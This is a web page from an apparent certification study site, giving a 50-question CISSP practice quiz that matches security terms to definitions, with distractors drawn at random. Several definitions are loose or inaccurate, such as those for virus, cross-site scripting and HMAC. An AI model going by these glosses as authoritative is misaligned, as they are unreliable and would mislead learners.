SUBJECTS
|
BROWSE
|
CAREER CENTER
|
POPULAR
|
JOIN
|
LOGIN
Business Skills
|
Soft Skills
|
Basic Literacy
|
Certifications
About
|
Help
|
Privacy
|
Terms
|
Email
Search
Test your basic knowledge |
CISSP Certified Information Systems Security Professional
Start Test
Study First
Subjects
:
certifications
,
it-skills
,
cissp
Instructions:
Answer 50 questions in 15 minutes.
If you are not ready to take this test, you can
study here
.
Match each statement with the correct term.
Don't refresh. All questions and answers are randomly picked and ordered every time you load a test.
This is a study tool. The 3 wrong answers for each question are randomly chosen from answers to other questions. So, you might find at times the answers obvious, but you will see it re-enforces your understanding as you take the test each time.
1. A programming design concept which abstracts one set of functions from another in a serialized fashion
Alternate Data Streams (File System Forks)
Notification
Layering
TCSEC (Orange Book)
2. A type of malformed input that takes advantage of an appropriate true conditional logic statement adding a request for data that is against the security policy
Authorization
Privacy Laws
Substitution
SQL Injection
3. Moving the alphabet intact a certain number spaces
Remote Access Trojan
Shift Cipher (Caesar)
Primary Storage
Exercise
4. Those actions and backup processes determined by an organization to be necessary to meet its data recovery and restoration objectives - including timeframes - technologies - offsite storage - and will ensuretime objectives can be met.
Cryptology
Data Backup Strategies
Deadlock
Full-Interruption test
5. An access policy determined by the owner of a file (or other resource). The owner decides who's allowed access to the file and what privileges they have - most commonly used in the PC environment (i.e. file permissions).
Site Policy
Preemptive
Job Rotation
Discretionary Access Control (DAC)
6. Information residing on computer systems - that is readily visible to the operating system with which it was created and is immediately accessible to users without deletion - modification or reconstruction.
Multi-Processing
Mock Disaster
Active Data
Mixed Law System
7. Mitigation of system or component loss or interruption through use of backup capability.
Fiber Optics
Fault Tolerance
Modems
Bollard
8. An access policy that uses a security label system. Users have clearances - and resources have security labels that contain data classifications. MAC compares these two attributes to determine access control capabilies - most commonly used in governm
Mandatory Access Control (MAC)
Mock Disaster
Modification
Exercise
9. A form of data hiding which protects running threads of execution from using each other's memory
Basics Of Secure Design
Mandatory Vacations
TEMPEST
Process Isolation
10. A formal announcement by pre-authorized personnel that a disaster or severe outage is predicted or has occurred and that triggers pre-arranged mitigating actions (e.g. A move to an alternate site.)
Cipher Text
Business Interruption Insurance
Framework
Declaration
11. Randomly-generated value used by many cryptosystems to ensure that a unique ciphertext is generated
Initialization Vector
Bridge
Exercise
Distributed Processing
12. Actions measured against either a policy or what a reasonable person would do
Data Marts
Top Secret
Due Diligence
Enticement
13. Maximum tolerance for loss of certain business function - basis of strategy
Standard
Contact List
Object Reuse
Recovery Time Objectives
14. Independent malware that requires user interaction to execute
Virus
Virtual Memory
Message Digest
Accreditation
15. Is secondhand and usually not admissible in court
Mitigate
Hearsay Evidence
Control
File Extension
16. Of a system without prior knowledge by the tester or the tested
Kernel
Change Control
Double Blind Testing
Hard Disk
17. A cable consisting of a core - inner conductor that is surrounding by an insulator - an outer cylindrical conductor
Centralized Access Control Technologies
Malformed Input
Virtual Memory
Coaxial Cable
18. Provides a physical cross connect point for devices.
Blind Testing
Voice Over IP (VOIP)
Disaster Recovery Tape
Patch Panels
19. The hardware and software mediator of all subject and object interactions which has as its primary goal security policy enforcement.
Virtual Memory
Reference Monitor
Transients
Picking
20. Process of statistically testing a data set for the likelihood of relevant information.
Repeaters
Domain
Sampling
Discretionary
21. A distributed system's transaction control that requires updates to complete or rollback
Honeypot
Alternate Site
Proprietary
2-Phase Commit
22. Two certificate authorities that trust each other
Control Category
Databases
Transients
Cross Certification
23. To assert or claim credentialing to an authentication system
Identification
Algorithm
Non-Discretionary Access Control
Redundant Array Of Independent Drives (RAID)
24. The technical and risk assesment of a system within the context of the operating environment
Certification
File Level Deletion
Log
Control Type
25. A hash that has been further encrypted with a symmetric algorithm
Due Care
Keyed-Hashing For Message Authentication
Administrative
Multi-Core
26. Real-time - automatic and transparent backup of data.
False Negative
Remote Journaling
Identification
Sampling
27. Systems whose incapacity or destruction would have a debilitating impact on the economic security of an organization - community - nation - etc
Inheritance
Access Control Attacks
Critical Infrastructure
Multiplexers
28. The study of cryptography and cryptanalysis
Cryptology
Access Control
Initialization Vector
Classification Scheme
29. The duplication of data on separate disks in real time to ensure its continuous availability - currency and accuracy. True mirroring will enable a zero recovery point objective.
Disk Mirroring
Algorithm
Compression
Site Policy Awareness
30. Recovery alternative which outsources a business function at a cost
Service Bureau
Non-Interference
Time Of Check/Time Of Use
Corrective
31. A test that answers the questions: Does the organization have the documentation and people it needs. Do they understand the documentation?
Surge
Desk Check Test
Critical Records
Need-To-Know
32. Third party processes used to organize the implementation of an architecture
Framework
Architecture
Packet Filtering
Process Isolation
33. Uses a role-based method to determine access rights and permissions. Role based access control is based on the user's role and responsibilities within the company.
Guidelines
Service Bureau
Kerberos
Non-Discretionary Access Control
34. Layer 1 network device that is used to connect network segments together - but provides no traffic control (a concentrator).
Hub
Access Control Attacks
Degauss
Databases
35. Motive - opportunity - and means; when looking for suspects it is important to consider these 3 things
MOM
Structured Walk-Through Test
Mock Disaster
Surveillance
36. A trusted issuer of digital certificates
Certification Authority
Administrative
Multi-Party Control
Business Continuity Program
37. A choice in risk management - to convince another to assume risk - typically by payment
Sag/Dip
Transfer
System Downtime
Control Category
38. Encryption system using a pair of mathematically related unequal keys
Cookie
Service Bureau
Keystroke Logging
Asymmetric
39. Need to understand both the assets that need to be protected and management's priorities - Also be prepared to adjust the design over time - and verify the design has been implemented correctly - need to be good negotiator - artist and analyst.
Mixed Law System
Basics Of Secure Design
Picking
Simulation Test
40. A tag of three or four letters - preceded by a period - which identifies a data file's format or the application used to create the file.
Ethics
Activation
File Extension
Certification Authority
41. An unintended communication path
Authorization
File
Framework
Covert Channel
42. Control category- to record an adversary's actions
Detective
Mitigate
Spyware
Reference Monitor
43. The process of recovering a database to the point of failure by applying active journal or log data to the current backup files of the database.
Forward Recovery
Rogue Access Points
Message Digest
Hearsay Evidence
44. Mitigate damage by isolating compromised systems from the network.
Switches
Security Kernel
Containment
Initialization Vector
45. Control category - more than one control on a single asset
Moore's Law
Mandatory Vacations
Compensating
Criminal Law
46. Location where coordination and execution of BCP or DRP is directed
Separation Of Duties
Examples of technical security components
Emergency Operations Center (EOC)
Investigation
47. Statistical probabilities of a collision are more likely than one thinks
Interpreter
Mitigate
Birthday Attack
Parallel Test
48. A planned or unplanned interruption in system availability.
Logic Bomb
System Downtime
Conflict Of Interest
Business Unit Recovery
49. Object reuse protection and auditing
Qualitative
Elements of Negligence
Orange Book C2 Classification
Fault Tolerance
50. Malware that uses the trust on a website to redirect users to untrusted websites which captures data or installs more malware
SQL Injection
Cross-Site Scripting
Technical Access Controls
Business Continuity Steering Committee